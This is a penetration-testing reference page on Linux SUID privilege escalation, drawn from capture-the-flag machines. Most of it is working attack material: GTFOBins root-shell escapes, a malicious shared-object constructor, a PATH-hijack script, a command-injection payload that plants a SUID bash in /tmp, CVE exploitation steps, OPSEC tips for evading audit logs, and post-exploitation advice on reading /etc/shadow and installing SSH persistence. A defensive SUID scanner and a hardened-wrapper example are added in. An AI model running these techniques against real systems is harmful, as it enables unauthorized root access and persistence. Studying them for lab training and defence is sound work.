SUID Abuse
# Overview

SUID (Set owner User ID) is a Unix permission flag that allows a binary to execute with the privileges of the file owner (typically root) rather than the user who runs it. When a SUID binary can be exploited -- whether through command injection, shared object hijacking, PATH manipulation, or a known vulnerability -- it becomes a direct path to root. GTFOBins catalogs dozens of exploitable SUID binaries.
# Prerequisites

- User-level shell access
- Standard tools: `find`, `ls`, `strings`, `strace`, `ltrace`
- GTFOBins knowledge: https://gtfobins.github.io/
# Detection & Enumeration

```bash
# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find all SUID binaries (verbose, with permissions)
find / -perm -4000 -exec ls -la {} \; 2>/dev/null

# Find SUID binaries not in standard directories (check non-standard ones first!)
# The patterns are anchored to the path start so that /usr/local/bin/* and /opt/*/bin/*
# are not silently excluded by an unanchored '/bin/' match
find / -perm -4000 -type f 2>/dev/null | grep -vE '^/(bin|sbin|usr/bin|usr/sbin|usr/lib)/'

# Find SGID binaries too
find / -perm -2000 -type f 2>/dev/null

# Check binary details
ls -la /path/to/binary
file /path/to/binary                                 # Static vs dynamic
strings /path/to/binary                              # Look for command calls, paths
strace /path/to/binary 2>&1 | grep -i "open\|exec"   # Trace system calls
ltrace /path/to/binary 2>&1                          # Trace library calls
```

Real example from Cerberus: /usr/bin/firejail was found as a non-standard SUID binary:

```bash
find / -perm -u=s -type f 2>/dev/null
firejail --version   # 0.9.68rc1 -- vulnerable to CVE-2022-31214
```
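The enumeration above is a set of one-off commands; for a repeatable audit (baseline a host, re-run after changes, feed a ticket) it helps to have the same logic as a small program. The following is an added example, not code from the page or from any tool it references: it walks a tree with `nftw`, reports every set-uid/set-gid regular file, and flags the cases this page says to look at first (outside the standard system directories, world-writable, or also carrying file capabilities via the `security.capability` xattr). The list of "standard" prefixes and the flag values are this example's own choices.

```c
/* suid_audit.c -- added example (not from the page): report privileged files
 * under a directory tree and flag the ones worth a closer look.
 * Build: gcc -O2 -o suid_audit suid_audit.c   Run: ./suid_audit /usr/local */
#define _GNU_SOURCE
#include <ftw.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/xattr.h>

enum {
    F_SUID    = 1,   /* set-user-ID bit set */
    F_SGID    = 2,   /* set-group-ID bit set */
    F_NONSTD  = 4,   /* outside the usual system binary directories */
    F_WWRITE  = 8,   /* world-writable: anyone can replace the privileged code */
    F_FILECAP = 16   /* also carries file capabilities (security.capability xattr) */
};

/* Directories where distribution SUID binaries normally live (this example's assumption). */
static const char *const standard_prefixes[] = {
    "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", NULL
};

int is_standard_path(const char *path)
{
    for (const char *const *p = standard_prefixes; *p; p++)
        if (strncmp(path, *p, strlen(*p)) == 0)
            return 1;
    return 0;
}

/* Classify one entry from its path and st_mode; returns a bitmask of F_* flags
 * (0 for anything that is not a privileged regular file). */
int classify_entry(const char *path, mode_t mode)
{
    int flags = 0;
    if (!S_ISREG(mode))
        return 0;
    if (mode & S_ISUID) flags |= F_SUID;
    if (mode & S_ISGID) flags |= F_SGID;
    if (!flags)
        return 0;                          /* only privileged files are interesting */
    if (!is_standard_path(path)) flags |= F_NONSTD;
    if (mode & S_IWOTH)          flags |= F_WWRITE;
    return flags;
}

static void print_entry(const char *path, int flags)
{
    printf("%s%s%s%s%s  %s\n",
           (flags & F_SUID)    ? " SUID"           : "",
           (flags & F_SGID)    ? " SGID"           : "",
           (flags & F_NONSTD)  ? " NONSTD"         : "",
           (flags & F_WWRITE)  ? " WORLD-WRITABLE" : "",
           (flags & F_FILECAP) ? " FILECAP"        : "",
           path);
}

/* nftw callback: classify regular files, add the capability flag, print hits. */
static int visit(const char *path, const struct stat *sb, int typeflag, struct FTW *ftwbuf)
{
    (void)ftwbuf;
    if (typeflag != FTW_F)                 /* skip directories, symlinks, unreadable entries */
        return 0;
    int flags = classify_entry(path, sb->st_mode);
    if (flags) {
        /* Linux stores file capabilities in the security.capability xattr. */
        if (getxattr(path, "security.capability", NULL, 0) > 0)
            flags |= F_FILECAP;
        print_entry(path, flags);
    }
    return 0;                              /* keep walking */
}

/* Walk 'root' without following symlinks. Returns 0 on success, -1 on error. */
int scan_tree(const char *root)
{
    return nftw(root, visit, 64, FTW_PHYS);
}

int main(int argc, char **argv)
{
    return scan_tree(argc > 1 ? argv[1] : "/") == 0 ? 0 : 1;
}
```

Running it against `/` from a normal user gives the same view an attacker's `find` gives; running it as root from cron and diffing the output against a stored baseline turns a new SUID file in /opt or /usr/local into an alert rather than a finding. Because it does not cross into `/proc` intelligently, point it at real filesystems (`/usr`, `/opt`, `/home`, `/var`) in production.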
# Exploitation / Execution

# GTFOBins Reference

Always cross-reference found SUID binaries with GTFOBins. Common exploitable SUID binaries and their escalation commands:

```bash
# pkexec (CVE-2021-4034 PwnKit) -- if version vulnerable
pkexec /bin/bash   # Post-exploit usage

# find
find . -exec /bin/sh -p \; -quit

# bash (if bash has SUID, with the -p flag)
bash -p

# vim
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

# less / more
less /etc/passwd
# Inside less: !/bin/sh

# cp / mv (overwrite /etc/passwd or /etc/sudoers)
# Overwrite /etc/passwd with a root user entry

# awk
awk 'BEGIN {system("/bin/sh")}'

# python/perl/ruby
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# tar
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```
# Non-Standard SUID Binaries (Higher Priority)

Binaries not in standard system paths are more likely to have exploitable behaviors. Check these first:

```bash
# Look for SUID binaries in custom paths
find /opt /home /tmp /var /srv /usr/local -perm -4000 -type f 2>/dev/null

# Example: /opt/scanner/scanner (from Intentions)
# Had the CAP_DAC_READ_SEARCH capability, bypassing file permission checks
```
# Shared Object Injection into SUID Binaries

When a SUID binary loads a custom shared object:

```bash
# Run the binary under strace to find missing libraries
strace /usr/local/bin/vulnerable_binary 2>&1 | grep -i "open\|ENOENT"

# Create a malicious shared object matching a missing library path
gcc -shared -fPIC -o /tmp/libmissing.so /tmp/exploit.c
```

/tmp/exploit.c:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is loaded, before the binary's main().
 * A constructor is used instead of defining _init(), which clashes with
 * the _init symbol from crti.o and fails to link on current toolchains. */
__attribute__((constructor))
static void init(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
```

```bash
# Run the binary so it loads our shared object
LD_LIBRARY_PATH=/tmp /usr/local/bin/vulnerable_binary
# Caveat: the dynamic loader ignores LD_LIBRARY_PATH and LD_PRELOAD for set-user-ID
# programs (secure-execution mode), so this only works when the missing library is
# searched for in a directory you can write to -- e.g. a writable RPATH/RUNPATH
# entry in the binary, or a writable path listed in ld.so.conf.
```
# PATH Manipulation for SUID Binaries

When a SUID binary calls another command without an absolute path:

```bash
# Check for relative command calls
strings /usr/local/bin/suid_binary | grep -E "^[a-zA-Z]"

# If it calls 'ls' or 'cat' without a full path:
echo '/bin/bash -p' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
/usr/local/bin/suid_binary   # Executes our fake 'ls' as root
```
# Bash -p Flag for SUID Shell

The -p flag prevents bash from dropping privileges when running as SUID. When the effective UID differs from the real UID, bash resets the effective UID to the real one at startup unless -p is given:

```bash
bash -p
# Now running with effective UID 0 (root)
id   # uid=1000(user) gid=1000(user) euid=0(root)
```
# Custom SUID Binary Exploitation Examples

Firejail (CVE-2022-31214) -- container breakout from Cerberus:

```bash
# Identify version
firejail --version      # 0.9.68rc1 - vulnerable

# Exploit: symlink attack on /run/firejail/mnt/join
./firejoin.py           # Create fake firejail process
firejail --join=<PID>   # Join the fake process, get root
```

Enlightenment (CVE-2022-37706) -- SUID on enlightenment_sys:

```bash
# If /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys is SUID
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/sh -p
```

Xorg.wrap -- if SUID and an arbitrary config can be specified:

```bash
# Create malicious Xorg config, execute Xorg.wrap
```
# Command Injection in SUID Binaries

Some custom SUID binaries accept user input that gets passed to system():

```bash
# Test with:
/usr/local/bin/suid_tool "test; id"
# If the output shows uid=0, command injection is confirmed

# Exploit:
/usr/local/bin/suid_tool "test; cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
/tmp/rootbash -p
```
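The two sections above (PATH manipulation and command injection) describe the same root cause from the attacker's side: a privileged wrapper that hands user-controlled strings, and the user's environment, to a shell. The following added example, not code from the page or from any machine it mentions, shows the vulnerable shape next to a hardened wrapper: an allow-list on the argument, an argv array with an absolute path instead of `system()`, a fixed environment so PATH and LD_* cannot be abused, and a `drop_privileges()` helper for the case where the wrapped program does not itself need root. The wrapped program path `/usr/local/bin/scanner` and the argument format are assumptions made for the example.

```c
/* suid_tool_hardened.c -- added example (not from the page): the system()
 * injection pattern beside a hardened privileged wrapper.
 * Build: gcc -O2 -o suid_tool suid_tool_hardened.c   (install 4755 root:root only after review) */
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SCANNER_PATH "/usr/local/bin/scanner"   /* hypothetical privileged helper target */

/* VULNERABLE shape: user input is spliced into a shell command line, so
 * "test; id" becomes two commands run as root via /bin/sh -c. Kept only to
 * show the bug; nothing in this file calls it. Returns 1 if the line fit. */
int build_command_unsafe(char *buf, size_t len, const char *user_arg)
{
    return snprintf(buf, len, "%s %s", SCANNER_PATH, user_arg) < (int)len;
}

/* Allow-list validation: one token of [A-Za-z0-9._-], 1..63 bytes, not starting
 * with '-' (cannot become an option) or '.' (no "..", no dotfiles). Returns 1 if safe. */
int arg_is_safe(const char *arg)
{
    size_t n = arg ? strlen(arg) : 0;
    if (n == 0 || n > 63 || arg[0] == '-' || arg[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Give up the set-uid privilege permanently and verify it cannot be regained.
 * Call this before exec when the wrapped program does not need root.
 * Returns 0 on success, -1 on failure. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (geteuid() == 0 && setgroups(0, NULL) != 0)     /* shed supplementary groups first */
        return -1;
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0)
        return -1;
    if (uid != 0 && setuid(0) == 0)                    /* regaining root must now fail */
        return -1;
    return 0;
}

/* Hardened launch: absolute path, argv array (no shell parses the argument),
 * and a fixed environment, so a caller's PATH, IFS or LD_* settings never reach
 * the privileged child. Only returns on failure. */
int run_hardened(const char *user_arg)
{
    if (!arg_is_safe(user_arg)) {
        fprintf(stderr, "rejected argument\n");
        return -1;
    }
    char *const argv[] = { SCANNER_PATH, (char *)user_arg, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };   /* nothing inherited from the caller */
    execve(SCANNER_PATH, argv, envp);
    perror("execve");
    return -1;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <name>\n", argv[0]);
        return 2;
    }
    return run_hardened(argv[1]) == 0 ? 0 : 1;
}
```

Against this wrapper the page's test input `test; id` is rejected before anything runs, and the fake `/tmp/ls` trick has no effect because the child starts with `PATH=/usr/bin:/bin` and is executed by absolute path. When reviewing a custom SUID binary, `strings` output containing `sh -c`, `system`, `popen` or a bare command name is the tell that it follows the unsafe shape instead.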
# strace/ltrace Analysis

```bash
# strace: trace all system calls
strace -f /usr/local/bin/suid_binary 2>&1 | grep -E "execve|open|access"

# ltrace: trace library calls (can reveal function usage)
ltrace /usr/local/bin/suid_binary 2>&1

# Both help identify: file opens, command executions, missing libraries
# Note: a traced SUID binary runs with the tracer's own privileges, so the
# trace shows its behaviour, not what it does as root
```
# doas -- Alternative to sudo

doas is common on OpenBSD, Alpine, and some Linux distros:

```bash
# Check for doas configuration
cat /etc/doas.conf
cat /usr/local/etc/doas.conf

# Common misconfigurations:
# permit nopass :wheel     # Any user in the wheel group can run any command
# permit nopass user cmd   # Specific user can run a specific command
# Exploitation same as sudo: if doas permits a command, check GTFOBins for that binary
```
# Capabilities on SUID Binaries

Always check capabilities alongside SUID -- a binary can have both:

```bash
find / -perm -4000 -exec getcap {} \; 2>/dev/null
# Example: binary is SUID AND has cap_setuid+ep → multiple exploitation paths
```
# Common Pitfalls

- Assuming all SUID binaries are in /bin, /sbin, /usr/bin -- custom applications in /opt or /usr/local may have SUID
- Not checking the binary version against CVE databases before attempting generic exploitation
- Forgetting the `bash -p` flag -- without it, bash drops SUID privileges
- strace/ltrace: the SUID binary may refuse to run under debuggers (ptrace restrictions), and when it does run, the kernel ignores the SUID bit for a traced process, so it executes with your own privileges
- Assuming a GTFOBins entry always works -- distribution patches may change binary behavior
- Overlooking shared object dependencies -- run `ldd /path/to/binary` to list them
# OPSEC Considerations

- `find / -perm -4000` is a standard admin command -- low noise.
- strace/ltrace on SUID binaries generates unusual audit events.
- Exploiting SUID binaries typically creates child processes visible in `ps aux`.
- Some SUID exploits (especially kernel-related) may cause system crashes or kernel panics.
- Successful exploitation may be logged by auditd or systemd-journald.
# Post-Exploitation Value

SUID exploitation provides immediate root access. The root shell can be used to: read /root/root.txt, access /etc/shadow and crack passwords, install SSH key persistence, dump process memory of privileged services, and pivot through the network with full privileges.
# Cross-References

# Tool References

| Tool | Link |
|---|---|
| GTFOBins | https://gtfobins.github.io/ |
| strace | Built-in: apt install strace |
| ltrace | Built-in: apt install ltrace |
# Source Machines

- Cerberus (Hard, Linux) - Firejail SUID binary CVE-2022-31214 used for container breakout to root
- Soccer (Easy, Linux) - doas SUID binary exploited via dstat plugin (custom Python code execution as root)
- Sau (Easy, Linux) - sudo on systemctl with pager escape (!/bin/bash)